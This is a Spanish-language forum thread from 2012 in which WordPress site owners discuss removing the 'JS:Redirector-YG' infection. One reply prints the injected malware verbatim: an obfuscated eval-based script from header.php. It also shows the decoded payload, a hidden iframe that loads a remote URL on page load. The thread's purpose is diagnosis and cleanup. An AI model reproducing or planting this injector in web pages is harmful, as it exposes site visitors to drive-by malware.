¿Cómo eliminar el virus JS:Redirector-YG en Wordpress?

lapso21 · 30 Jul 2012

Es muy simple, tengo un virus que se llama JS:Redirector-YG [Trj], No soy el unico usuario de forobeta que esta lideando con esto. Pero hay un post viejo que da una solución que no me funciono.

El virus me lo muestra avast y en el buscador me poner esto:

Error 101 (net::ERR_CONNECTION_RESET): Se ha restablecido la conexión.

Alguien me podrá ayudar? este virus me esta haciendo perder visitas.

la pagina es: Enlace eliminado

este problema empezó después que recibí un mensaje que dice el post viejo donde me pide que cambien el pie de pagina, hasta ahí estaba todo bien después paso esto.

gilberto · 30 Jul 2012

Yo puedo ver la pagina sin ningun problema , a veces me ha pasado eso cuando tengo problemas de DNS !!

MAF · 30 Jul 2012

Cierto, me aparece esto al entrar:

Cicklow · 30 Jul 2012

el virus esta en el header.php o functions.php ya que se agrega en el header:

Insertar CODE, HTML o PHP:

<script>try{1-prototype;}catch(asd){x=2;}
if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103,48,36,38,99,94,90,94,86,92,98,98,88,112,106,105,36,99,92,106,36,111,99,97,37,102,93,103,24,48,4,0,94,93,104,98,37,95,89,23,51,21,30,92,103,100,63,89,30,49,2,1,90,100,90,107,98,92,100,105,37,88,100,91,111,35,88,102,101,92,100,89,58,94,94,99,90,29,96,92,103,100,31,48,4,0,114,50,3,-1,110,95,99,91,101,108,37,101,99,99,101,86,91,22,50,23,92,103,100,55,89,91,49,2,1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;286-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}
if(x&&f&&012===10)e(s);</script>

mp0889 · 30 Jul 2012

Mejor no entro, me puede infectar mi pc por que no tengo antivirus Jeje Creo que existen antivirus para Wordpress, deberías buscar 😉

Cicklow · 30 Jul 2012

El codigo desencriptado hace esto:

HTML:

function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src  = "http://michaelmazur.net/xml.php";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;

lapso21 · 31 Jul 2012

MAF dijo:
Cierto, me aparece esto al entrar: Ver el archivo adjunto 7354

Al parecer con los datos de cicklow ya desapareció el problema, pero tengo que saber si podes entrar. Ahora el virus solo me afecta a mi, lo que es bloquear la pagina.

MAF · 31 Jul 2012

lapso21 dijo:
Al parecer con los datos de cicklow ya desapareció el problema, pero tengo que saber si podes entrar. Ahora el virus solo me afecta a mi, lo que es bloquear la pagina.

Ahora si puedo entrar sin problemas. Ya no salta el antivirus 🙂

ramonjosegn · 31 Jul 2012

Hola

Tengo la solución para este tipo de problemas

Es un plugin que se llama Wordfence y permite escanear toda la instalación de Wordpress y reinstalar los archivos dañados/infectados

También es importante que actives en las opciones "escanear archivos fuera del core wordpress" ya de que esa manera averiguas si hay otros archivos como en el theme perjudicados

A mí me ha funciona bien, aunque para protección general -que para eso es el plugin- me ha dado algunos quebraderos de cabeza, por lo que estoy usando plugins más "suaves" por el momento

lapso21 · 31 Jul 2012

gracias el problema ya esta resuelto

ivanlariz · 31 Jul 2012

Pues a mi me aparece el virus solo con entrar a este tema, sin entrar a esa web!

Aqui la prueba:

Enlace eliminado

franquicias · 31 Jul 2012

Fué porque pegaron los códigos del virus en el post, por eso te lo detecta el antivirus.. jaja

ivanlariz · 31 Jul 2012

franquicias dijo:
Fué porque pegaron los códigos del virus en el post, por eso te lo detecta el antivirus.. jaja

Cierto, será eso :encouragement:

lapso21 · 31 Jul 2012

ivanlariz dijo:
Pues a mi me aparece el virus solo con entrar a este tema, sin entrar a esa web!

Aqui la prueba:

Enlace eliminado

franquicias dijo:
Fué porque pegaron los códigos del virus en el post, por eso te lo detecta el antivirus.. jaja

Les cuento, acabo de descubrir algo muy importante, cuidado con las reseñas. Un usuario de forobeta acaba de comprarme una reseña cuando entre para ver, me salto el mismo virus. revise las reseñas anteriores y encontré otro. Se ve que al hacer la reseña el virus se pasa. ahora ya están informados y ambas web ya no tienen el virus (por que les avise y les pase este post, ya que es muy fácil eliminarlo). Ahora mi consejo es que entren al sitio del comprador para asegurarte que no tenga el virus.

jarocho · 31 Jul 2012

lapso21 dijo:
Les cuento, acabo de descubrir algo muy importante, cuidado con las reseñas. Un usuario de forobeta acaba de comprarme una reseña cuando entre para ver, me salto el mismo virus. revise las reseñas anteriores y encontré otro. Se ve que al hacer la reseña el virus se pasa. ahora ya están informados y ambas web ya no tienen el virus (por que les avise y les pase este post, ya que es muy fácil eliminarlo). Ahora mi consejo es que entren al sitio del comprador para asegurarte que no tenga el virus.

Podrias dar mas detalles porfavor? 🙂

¿Cómo eliminar el virus JS:Redirector-YG en Wordpress?

lapso21

gilberto

MAF

Cicklow

mp0889

Cicklow

lapso21

MAF

ramonjosegn

lapso21

ivanlariz

franquicias

ivanlariz

lapso21

jarocho

Temas similares